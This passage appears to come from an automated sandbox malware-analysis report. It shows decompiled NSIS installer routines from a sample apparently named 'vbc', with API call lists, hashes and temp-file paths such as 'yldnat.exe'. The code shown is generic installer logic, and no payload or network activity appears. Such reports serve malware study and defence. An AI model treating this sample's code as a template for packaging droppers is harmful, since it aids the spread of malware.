                                                        							SelectObject(_t128, _a8);
                                                        							DeleteObject(_a16);
                                                        						}
                                                        					}
                                                        					EndPaint(_a4,  &_v96);
                                                        					return 0;
                                                        				}
                                                        				_t102 = _a16;
                                                        				if(_a8 == 0x46) {
                                                        					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
                                                        					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
                                                        				}
                                                        				return DefWindowProcW(_a4, _a8, _a12, _t102);
                                                        			}

                                                        0x0040100a
                                                        0x00401039
                                                        0x00401047
                                                        0x0040104d
                                                        0x00401051
                                                        0x0040105b
                                                        0x00401061
                                                        0x00401064
                                                        0x004010f3
                                                        0x00401089
                                                        0x0040108c
                                                        0x004010a6
                                                        0x004010bd
                                                        0x004010cc
                                                        0x004010cf
                                                        0x004010d5
                                                        0x004010d9
                                                        0x004010e4
                                                        0x004010ed
                                                        0x004010ef
                                                        0x004010ef
                                                        0x00401100
                                                        0x00401105
                                                        0x0040110d
                                                        0x00401110
                                                        0x00401112
                                                        0x00401118
                                                        0x0040111f
                                                        0x00401126
                                                        0x00401130
                                                        0x00401142
                                                        0x00401156
                                                        0x00401160
                                                        0x00401165
                                                        0x00401165
                                                        0x00401110
                                                        0x0040116e
                                                        0x00000000
                                                        0x00401178
                                                        0x00401010
                                                        0x00401013
                                                        0x00401015
                                                        0x0040101f
                                                        0x0040101f
                                                        0x00000000

                                                        APIs
                                                        • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                        • BeginPaint.USER32(?,?), ref: 00401047
                                                        • GetClientRect.USER32 ref: 0040105B
                                                        • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                        • FillRect.USER32 ref: 004010E4
                                                        • DeleteObject.GDI32(?), ref: 004010ED
                                                        • CreateFontIndirectW.GDI32(?), ref: 00401105
                                                        • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                        • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                        • SelectObject.GDI32(00000000,?), ref: 00401140
                                                        • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
                                                        • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                        • DeleteObject.GDI32(?), ref: 00401165
                                                        • EndPaint.USER32(?,?), ref: 0040116E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                        • String ID: F
                                                        • API String ID: 941294808-1304234792
                                                        • Opcode ID: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                                                        • Instruction ID: 97a6e5849d711934decb320d9e1447055a7c39d586dd296ee09aa65e352ff849
                                                        • Opcode Fuzzy Hash: 6e3369a96ed7e46a89c954ac000689aa30afdbe1f06b793fb73954c758a37c86
                                                        • Instruction Fuzzy Hash: 83418C71800209AFCF058F95CE459AF7BB9FF45315F00802AF991AA1A0CB389A55DFA4
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 72%
                                                        			E004066AB(void* __ebx, void* __edi, void* __esi, signed int _a4, short _a8) {
                                                        				struct _ITEMIDLIST* _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				signed int _v28;
                                                        				signed int _t44;
                                                        				WCHAR* _t45;
                                                        				signed char _t47;
                                                        				signed int _t48;
                                                        				short _t59;
                                                        				short _t61;
                                                        				short _t63;
                                                        				void* _t71;
                                                        				signed int _t77;
                                                        				signed int _t78;
                                                        				short _t81;
                                                        				short _t82;
                                                        				signed char _t84;
                                                        				signed int _t85;
                                                        				void* _t98;
                                                        				void* _t104;
                                                        				intOrPtr* _t105;
                                                        				void* _t107;
                                                        				WCHAR* _t108;
                                                        				void* _t110;
                                                        
                                                        				_t107 = __esi;
                                                        				_t104 = __edi;
                                                        				_t71 = __ebx;
                                                        				_t44 = _a8;
                                                        				if(_t44 < 0) {
                                                        					_t44 =  *( *0x7a7a7c - 4 + _t44 * 4);
                                                        				}
                                                        				_push(_t71);
                                                        				_push(_t107);
                                                        				_push(_t104);
                                                        				_t105 =  *0x7a8ad8 + _t44 * 2;
                                                        				_t45 = 0x7a6a40;
                                                        				_t108 = 0x7a6a40;
                                                        				if(_a4 >= 0x7a6a40 && _a4 - 0x7a6a40 >> 1 < 0x800) {
                                                        					_t108 = _a4;
                                                        					_a4 = _a4 & 0x00000000;
                                                        				}
                                                        				_t81 =  *_t105;
                                                        				_a8 = _t81;
                                                        				if(_t81 == 0) {
                                                        					L43:
                                                        					 *_t108 =  *_t108 & 0x00000000;
                                                        					if(_a4 == 0) {
                                                        						return _t45;
                                                        					}
                                                        					return E0040666E(_a4, _t45);
                                                        				} else {
                                                        					while((_t108 - _t45 & 0xfffffffe) < 0x800) {
                                                        						_t98 = 2;
                                                        						_t105 = _t105 + _t98;
                                                        						if(_t81 >= 4) {
                                                        							if(__eflags != 0) {
                                                        								 *_t108 = _t81;
                                                        								_t108 = _t108 + _t98;
                                                        								__eflags = _t108;
                                                        							} else {
                                                        								 *_t108 =  *_t105;
                                                        								_t108 = _t108 + _t98;
                                                        								_t105 = _t105 + _t98;
                                                        							}
                                                        							L42:
                                                        							_t82 =  *_t105;
                                                        							_a8 = _t82;
                                                        							if(_t82 != 0) {
                                                        								_t81 = _a8;
                                                        								continue;
                                                        							}
                                                        							goto L43;
                                                        						}
                                                        						_t84 =  *((intOrPtr*)(_t105 + 1));
                                                        						_t47 =  *_t105;
                                                        						_t48 = _t47 & 0x000000ff;
                                                        						_v12 = (_t84 & 0x0000007f) << 0x00000007 | _t47 & 0x0000007f;
                                                        						_t85 = _t84 & 0x000000ff;
                                                        						_v28 = _t48 | 0x00008000;
                                                        						_t77 = 2;
                                                        						_v16 = _t85;
                                                        						_t105 = _t105 + _t77;
                                                        						_v24 = _t48;
                                                        						_v20 = _t85 | 0x00008000;
                                                        						if(_a8 != _t77) {
                                                        							__eflags = _a8 - 3;
                                                        							if(_a8 != 3) {
                                                        								__eflags = _a8 - 1;
                                                        								if(__eflags == 0) {
                                                        									__eflags = (_t48 | 0xffffffff) - _v12;
                                                        									E004066AB(_t77, _t105, _t108, _t108, (_t48 | 0xffffffff) - _v12);
                                                        								}
                                                        								L38:
                                                        								_t108 =  &(_t108[lstrlenW(_t108)]);
                                                        								_t45 = 0x7a6a40;
                                                        								goto L42;
                                                        							}
                                                        							_t78 = _v12;
                                                        							__eflags = _t78 - 0x1d;
                                                        							if(_t78 != 0x1d) {
                                                        								__eflags = (_t78 << 0xb) + 0x7a9000;
                                                        								E0040666E(_t108, (_t78 << 0xb) + 0x7a9000);
                                                        							} else {
                                                        								E004065B5(_t108,  *0x7a8aa8);
                                                        							}
                                                        							__eflags = _t78 + 0xffffffeb - 7;
                                                        							if(__eflags < 0) {
                                                        								L29:
                                                        								E004068F5(_t108);
                                                        							}
                                                        							goto L38;
                                                        						}
                                                        						if( *0x7a8b24 != 0) {
                                                        							_t77 = 4;
                                                        						}
                                                        						_t121 = _t48;
                                                        						if(_t48 >= 0) {
                                                        							__eflags = _t48 - 0x25;
                                                        							if(_t48 != 0x25) {
                                                        								__eflags = _t48 - 0x24;
                                                        								if(_t48 == 0x24) {
                                                        									GetWindowsDirectoryW(_t108, 0x400);
                                                        									_t77 = 0;
                                                        								}
                                                        								while(1) {
                                                        									__eflags = _t77;
                                                        									if(_t77 == 0) {
                                                        										goto L26;
                                                        									}
                                                        									_t59 =  *0x7a8aa4;
                                                        									_t77 = _t77 - 1;
                                                        									__eflags = _t59;
                                                        									if(_t59 == 0) {
                                                        										L22:
                                                        										_t61 = SHGetSpecialFolderLocation( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18),  &_v8);
                                                        										__eflags = _t61;
                                                        										if(_t61 != 0) {
                                                        											L24:
                                                        											 *_t108 =  *_t108 & 0x00000000;
                                                        											__eflags =  *_t108;
                                                        											continue;
                                                        										}
                                                        										__imp__SHGetPathFromIDListW(_v8, _t108);
                                                        										_a8 = _t61;
                                                        										__imp__CoTaskMemFree(_v8);
                                                        										__eflags = _a8;
                                                        										if(_a8 != 0) {
                                                        											goto L26;
                                                        										}
                                                        										goto L24;
                                                        									}
                                                        									_t63 =  *_t59( *0x7a8aa8,  *(_t110 + _t77 * 4 - 0x18), 0, 0, _t108);
                                                        									__eflags = _t63;
                                                        									if(_t63 == 0) {
                                                        										goto L26;
                                                        									}
                                                        									goto L22;
                                                        								}
                                                        								goto L26;
                                                        							}
                                                        							GetSystemDirectoryW(_t108, 0x400);
                                                        							goto L26;
                                                        						} else {
                                                        							E0040653C( *0x7a8ad8, _t121, 0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion",  *0x7a8ad8 + (_t48 & 0x0000003f) * 2, _t108, _t48 & 0x00000040);
                                                        							if( *_t108 != 0) {
                                                        								L27:
                                                        								if(_v16 == 0x1a) {
                                                        									lstrcatW(_t108, L"\\Microsoft\\Internet Explorer\\Quick Launch");
                                                        								}
                                                        								goto L29;
                                                        							}
                                                        							E004066AB(_t77, _t105, _t108, _t108, _v16);
                                                        							L26:
                                                        							if( *_t108 == 0) {
                                                        								goto L29;
                                                        							}
                                                        							goto L27;
                                                        						}
                                                        					}
                                                        					goto L43;
                                                        				}
                                                        			}


                                                        APIs
                                                        • GetSystemDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000400), ref: 004067C6
                                                        • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000400,00000000,007A0F68,?,00405707,007A0F68,00000000,00000000,00000000,00000000), ref: 004067D9
                                                        • lstrcatW.KERNEL32 ref: 00406850
                                                        • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                                        Strings
                                                        Memory Dump Source
• Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Directory$SystemWindowslstrcatlstrlen
                                                        • String ID: C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                        • API String ID: 4260037668-2039163676
                                                        • Opcode ID: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                                                        • Instruction ID: c9eaf07520507b798c7259a568fd9567d3c8f5a418c476a208567326fda18bee
                                                        • Opcode Fuzzy Hash: e97bab54976981856f27dbe6ed1afce439577a8d563873806ee3eb84eabe0ca4
                                                        • Instruction Fuzzy Hash: F061FF72902115AADF10AF68CC40BAE37A5AF55314F22C03FE947B62D0DB3D49A5CB89
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E00404631(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
                                                        				struct tagLOGBRUSH _v16;
                                                        				long _t39;
                                                        				long _t41;
                                                        				void* _t44;
                                                        				signed char _t50;
                                                        				long* _t54;
                                                        
                                                        				if(_a4 + 0xfffffecd > 5) {
                                                        					L18:
                                                        					return 0;
                                                        				}
                                                        				_t54 = GetWindowLongW(_a12, 0xffffffeb);
                                                        				if(_t54 == 0 || _t54[2] > 1 || _t54[4] > 2) {
                                                        					goto L18;
                                                        				} else {
                                                        					_t50 = _t54[5];
                                                        					if((_t50 & 0xffffffe0) != 0) {
                                                        						goto L18;
                                                        					}
                                                        					_t39 =  *_t54;
                                                        					if((_t50 & 0x00000002) != 0) {
                                                        						_t39 = GetSysColor(_t39);
                                                        					}
                                                        					if((_t54[5] & 0x00000001) != 0) {
                                                        						SetTextColor(_a8, _t39);
                                                        					}
                                                        					SetBkMode(_a8, _t54[4]);
                                                        					_t41 = _t54[1];
                                                        					_v16.lbColor = _t41;
                                                        					if((_t54[5] & 0x00000008) != 0) {
                                                        						_t41 = GetSysColor(_t41);
                                                        						_v16.lbColor = _t41;
                                                        					}
                                                        					if((_t54[5] & 0x00000004) != 0) {
                                                        						SetBkColor(_a8, _t41);
                                                        					}
                                                        					if((_t54[5] & 0x00000010) != 0) {
                                                        						_v16.lbStyle = _t54[2];
                                                        						_t44 = _t54[3];
                                                        						if(_t44 != 0) {
                                                        							DeleteObject(_t44);
                                                        						}
                                                        						_t54[3] = CreateBrushIndirect( &_v16);
                                                        					}
                                                        					return _t54[3];
                                                        				}
                                                        			}


                                                        APIs
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                        • String ID:
                                                        • API String ID: 2320649405-0
                                                        • Opcode ID: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                        • Instruction ID: 80d2dfdfbb5be5877469216c844a522b7394a6fa1e0a99176855ee87e7478973
                                                        • Opcode Fuzzy Hash: f4fe220c79686689299554ac50abea47664d32920eac269e7a43003585d3568b
                                                        • Instruction Fuzzy Hash: EC2179B15007049BC730DF68D908B5BBBF8AF41714F048E2EE9D6A26E1E739D944DB68
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 87%
                                                        			E004026EC(intOrPtr __ebx, intOrPtr __edx, void* __edi) {
                                                        				intOrPtr _t65;
                                                        				intOrPtr _t66;
                                                        				intOrPtr _t72;
                                                        				void* _t76;
                                                        				void* _t79;
                                                        
                                                        				_t72 = __edx;
                                                        				 *((intOrPtr*)(_t76 - 8)) = __ebx;
                                                        				_t65 = 2;
                                                        				 *((intOrPtr*)(_t76 - 0x4c)) = _t65;
                                                        				_t66 = E00402D84(_t65);
                                                        				_t79 = _t66 - 1;
                                                        				 *((intOrPtr*)(_t76 - 0x10)) = _t72;
                                                        				 *((intOrPtr*)(_t76 - 0x44)) = _t66;
                                                        				if(_t79 < 0) {
                                                        					L36:
                                                        					 *0x7a8b28 =  *0x7a8b28 +  *(_t76 - 4);
                                                        				} else {
                                                        					__ecx = 0x3ff;
                                                        					if(__eax > 0x3ff) {
                                                        						 *(__ebp - 0x44) = 0x3ff;
                                                        					}
                                                        					if( *__edi == __bx) {
                                                        						L34:
                                                        						__ecx =  *(__ebp - 0xc);
                                                        						__eax =  *(__ebp - 8);
                                                        						 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __bx;
                                                        						if(_t79 == 0) {
                                                        							 *(_t76 - 4) = 1;
                                                        						}
                                                        						goto L36;
                                                        					} else {
                                                        						 *(__ebp - 0x38) = __ebx;
                                                        						 *(__ebp - 0x18) = E004065CE(__ecx, __edi);
                                                        						if( *(__ebp - 0x44) > __ebx) {
                                                        							do {
                                                        								if( *((intOrPtr*)(__ebp - 0x34)) != 0x39) {
                                                        									if( *((intOrPtr*)(__ebp - 0x24)) != __ebx ||  *(__ebp - 8) != __ebx || E0040623F( *(__ebp - 0x18), __ebx) >= 0) {
                                                        										__eax = __ebp - 0x50;
                                                        										if(E004061E1( *(__ebp - 0x18), __ebp - 0x50, 2) == 0) {
                                                        											goto L34;
                                                        										} else {
                                                        											goto L21;
                                                        										}
                                                        									} else {
                                                        										goto L34;
                                                        									}
                                                        								} else {
                                                        									__eax = __ebp - 0x40;
                                                        									_push(__ebx);
                                                        									_push(__ebp - 0x40);
                                                        									__eax = 2;
                                                        									__ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)) = __ebp + 0xa;
                                                        									__eax = ReadFile( *(__ebp - 0x18), __ebp + 0xa, __ebp - 0x40 -  *((intOrPtr*)(__ebp - 0x24)), ??, ??);
                                                        									if(__eax == 0) {
                                                        										goto L34;
                                                        									} else {
                                                        										__ecx =  *(__ebp - 0x40);
                                                        										if(__ecx == __ebx) {
                                                        											goto L34;
                                                        										} else {
                                                        											__ax =  *(__ebp + 0xa) & 0x000000ff;
                                                        											 *(__ebp - 0x4c) = __ecx;
                                                        											 *(__ebp - 0x50) = __eax;
                                                        											if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                        												L28:
                                                        												__ax & 0x0000ffff = E004065B5( *(__ebp - 0xc), __ax & 0x0000ffff);
                                                        											} else {
                                                        												__ebp - 0x50 = __ebp + 0xa;
                                                        												if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa, __ecx, __ebp - 0x50, 1) != 0) {
                                                        													L21:
                                                        													__eax =  *(__ebp - 0x50);
                                                        												} else {
                                                        													__edi =  *(__ebp - 0x4c);
                                                        													__edi =  ~( *(__ebp - 0x4c));
                                                        													while(1) {
                                                        														_t22 = __ebp - 0x40;
                                                        														 *_t22 =  *(__ebp - 0x40) - 1;
                                                        														__eax = 0xfffd;
                                                        														 *(__ebp - 0x50) = 0xfffd;
                                                        														if( *_t22 == 0) {
                                                        															goto L22;
                                                        														}
                                                        														 *(__ebp - 0x4c) =  *(__ebp - 0x4c) - 1;
                                                        														__edi = __edi + 1;
                                                        														SetFilePointer( *(__ebp - 0x18), __edi, __ebx, 1) = __ebp - 0x50;
                                                        														__eax = __ebp + 0xa;
                                                        														if(MultiByteToWideChar(__ebx, 8, __ebp + 0xa,  *(__ebp - 0x40), __ebp - 0x50, 1) == 0) {
                                                        															continue;
                                                        														} else {
                                                        															goto L21;
                                                        														}
                                                        														goto L22;
                                                        													}
                                                        												}
                                                        												L22:
                                                        												if( *((intOrPtr*)(__ebp - 0x24)) != __ebx) {
                                                        													goto L28;
                                                        												} else {
                                                        													if( *(__ebp - 0x38) == 0xd ||  *(__ebp - 0x38) == 0xa) {
                                                        														if( *(__ebp - 0x38) == __ax || __ax != 0xd && __ax != 0xa) {
                                                        															 *(__ebp - 0x4c) =  ~( *(__ebp - 0x4c));
                                                        															__eax = SetFilePointer( *(__ebp - 0x18),  ~( *(__ebp - 0x4c)), __ebx, 1);
                                                        														} else {
                                                        															__ecx =  *(__ebp - 0xc);
                                                        															__edx =  *(__ebp - 8);
                                                        															 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                        															 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                        														}
                                                        														goto L34;
                                                        													} else {
                                                        														__ecx =  *(__ebp - 0xc);
                                                        														__edx =  *(__ebp - 8);
                                                        														 *(__ebp - 8) =  *(__ebp - 8) + 1;
                                                        														 *( *(__ebp - 0xc) +  *(__ebp - 8) * 2) = __ax;
                                                        														 *(__ebp - 0x38) = __eax;
                                                        														if(__ax == __bx) {
                                                        															goto L34;
                                                        														} else {
                                                        															goto L26;
                                                        														}
                                                        													}
                                                        												}
                                                        											}
                                                        										}
                                                        									}
                                                        								}
                                                        								goto L37;
                                                        								L26:
                                                        								__eax =  *(__ebp - 8);
                                                        							} while ( *(__ebp - 8) <  *(__ebp - 0x44));
                                                        						}
                                                        						goto L34;
                                                        					}
                                                        				}
                                                        				L37:
                                                        				return 0;
                                                        			}

                                                        APIs
                                                        • ReadFile.KERNEL32(?,?,?,?), ref: 00402758
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,00000001), ref: 00402793
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004027B6
                                                        • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004027CC
                                                          • Part of subcall function 0040623F: SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,?,?,?,004026D1,00000000,00000000,?,00000000,00000011), ref: 00406255
                                                        • SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 00402878
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000004.00000002.994735645.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994773176.0000000000408000.00000002.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994811591.000000000040A000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.994863087.000000000040C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995261531.000000000077C000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995299454.0000000000782000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995327222.0000000000786000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995333439.0000000000789000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995350711.00000000007A6000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995357768.00000000007B5000.00000004.00000001.01000000.00000004.sdmp
                                                        • Associated: 00000004.00000002.995364915.00000000007B9000.00000002.00000001.01000000.00000004.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: File$Pointer$ByteCharMultiWide$Read
                                                        • String ID: 9
                                                        • API String ID: 163830602-2366072709
                                                        • Opcode ID: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                                                        • Instruction ID: 3e360b617c3737f2e779930334e882a7207aef4f73e2c1e076e29b282e1bb3de
                                                        • Opcode Fuzzy Hash: ea37fd964e3ddf3b7a618de9004236b276f671010f51a76b8aa07d43f39fc3cd
                                                        • Instruction Fuzzy Hash: 60510B75D00219ABDF20EF95CA89AAEBB79FF04304F10817BE541B62D4D7B49D82CB58
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 100%
                                                        			E004056D0(signed int _a4, WCHAR* _a8) {
                                                        				struct HWND__* _v8;
                                                        				signed int _v12;
                                                        				WCHAR* _v32;
                                                        				long _v44;
                                                        				int _v48;
                                                        				void* _v52;
                                                        				void* __ebx;
                                                        				void* __edi;
                                                        				void* __esi;
                                                        				WCHAR* _t27;
                                                        				signed int _t28;
                                                        				long _t29;
                                                        				signed int _t37;
                                                        				signed int _t38;
                                                        
                                                        				_t27 =  *0x7a7a84;
                                                        				_v8 = _t27;
                                                        				if(_t27 != 0) {
                                                        					_t37 =  *0x7a8b54;
                                                        					_v12 = _t37;
                                                        					_t38 = _t37 & 0x00000001;
                                                        					if(_t38 == 0) {
                                                        						E004066AB(_t38, 0, 0x7a0f68, 0x7a0f68, _a4);
                                                        					}
                                                        					_t27 = lstrlenW(0x7a0f68);
                                                        					_a4 = _t27;
                                                        					if(_a8 == 0) {
                                                        						L6:
                                                        						if((_v12 & 0x00000004) == 0) {
                                                        							_t27 = SetWindowTextW( *0x7a7a68, 0x7a0f68);
                                                        						}
                                                        						if((_v12 & 0x00000002) == 0) {
                                                        							_v32 = 0x7a0f68;
                                                        							_v52 = 1;
                                                        							_t29 = SendMessageW(_v8, 0x1004, 0, 0);
                                                        							_v44 = 0;
                                                        							_v48 = _t29 - _t38;
                                                        							SendMessageW(_v8, 0x104d - _t38, 0,  &_v52);
                                                        							_t27 = SendMessageW(_v8, 0x1013, _v48, 0);
                                                        						}
                                                        						if(_t38 != 0) {
                                                        							_t28 = _a4;
                                                        							0x7a0f68[_t28] = 0;
                                                        							return _t28;
                                                        						}
                                                        					} else {
                                                        						_t27 = lstrlenW(_a8) + _a4;
                                                        						if(_t27 < 0x1000) {
                                                        							_t27 = lstrcatW(0x7a0f68, _a8);
                                                        							goto L6;
                                                        						}
                                                        					}
                                                        				}
                                                        				return _t27;
                                                        			}

                                                        APIs
                                                        • lstrlenW.KERNEL32(007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405708
                                                        • lstrlenW.KERNEL32(004030A8,007A0F68,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405718
                                                        • lstrcatW.KERNEL32 ref: 0040572B
                                                        • SetWindowTextW.USER32 ref: 0040573D
                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405763
                                                        • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040577D
                                                        • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040578B
                                                          • Part of subcall function 004066AB: lstrcatW.KERNEL32 ref: 00406850
                                                          • Part of subcall function 004066AB: lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\yldnat.exe C:\Users\user\AppData\Local\Temp\boswagvgna,00000000,007A0F68,?,00405707,007A0F68,00000000), ref: 004068AA
                                                        Memory Dump Source
                                                        • Source File: 00000004.00000002.994761349.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                                                        Similarity
                                                        • API ID: MessageSendlstrlen$lstrcat$TextWindow
                                                        • String ID:
                                                        • API String ID: 1495540970-0
                                                        • Opcode ID: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                                                        • Instruction ID: b1df74b24ef97eccf04675f52fbaffa54a328febca5869b92639b2b84e823bb6
                                                        • Opcode Fuzzy Hash: 5359f18cea5025c05ea2e312da5c850c9979a77eaabc6fad8f28e044c716b6a3
                                                        • Instruction Fuzzy Hash: 32219D71900518FACF119FA5DD84ACFBFB8EF85350F10842AF904B6290C7794A40DFA8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 91%
                                                        			// Sanitises a filename in place: drops a "\\?\" prefix and a two-character path
                                                        			// spec, removes control characters and the characters *?|<>/": , then trims
                                                        			// trailing spaces and backslashes. Structure and character set match NSIS's
                                                        			// validate_filename() (exehead/util.c); on that reading E00405FB4 is
                                                        			// validpathspec(), E00405F6A is findchar() and E00406119 is mini_memcpy().
                                                        			E004068F5(WCHAR* _a4) {
                                                        				short _t5;
                                                        				short _t7;
                                                        				WCHAR* _t19;
                                                        				WCHAR* _t20;
                                                        				WCHAR* _t21;
                                                        
                                                        				_t20 = _a4;
                                                        				// skip an extended-length prefix "\\?\" (0x5c 0x5c 0x3f 0x5c)
                                                        				if( *_t20 == 0x5c && _t20[1] == 0x5c && _t20[2] == 0x3f && _t20[3] == 0x5c) {
                                                        					_t20 =  &(_t20[4]);
                                                        				}
                                                        				// skip a two-character path spec such as "C:" or "\\"
                                                        				if( *_t20 != 0 && E00405FB4(_t20) != 0) {
                                                        					_t20 =  &(_t20[2]);
                                                        				}
                                                        				_t5 =  *_t20;
                                                        				_t21 = _t20;    // start of the output
                                                        				_t19 = _t20;    // write cursor: the string is compacted in place
                                                        				if(_t5 != 0) {
                                                        					do {
                                                        						// keep the character only if it is not a control character (<= 0x1f)
                                                        						// and not one of *?|<>/":
                                                        						if(_t5 > 0x1f &&  *((short*)(E00405F6A(L"*?|<>/\":", _t5))) == 0) {
                                                        							E00406119(_t19, _t20, CharNextW(_t20) - _t20 >> 1);
                                                        							_t19 = CharNextW(_t19);
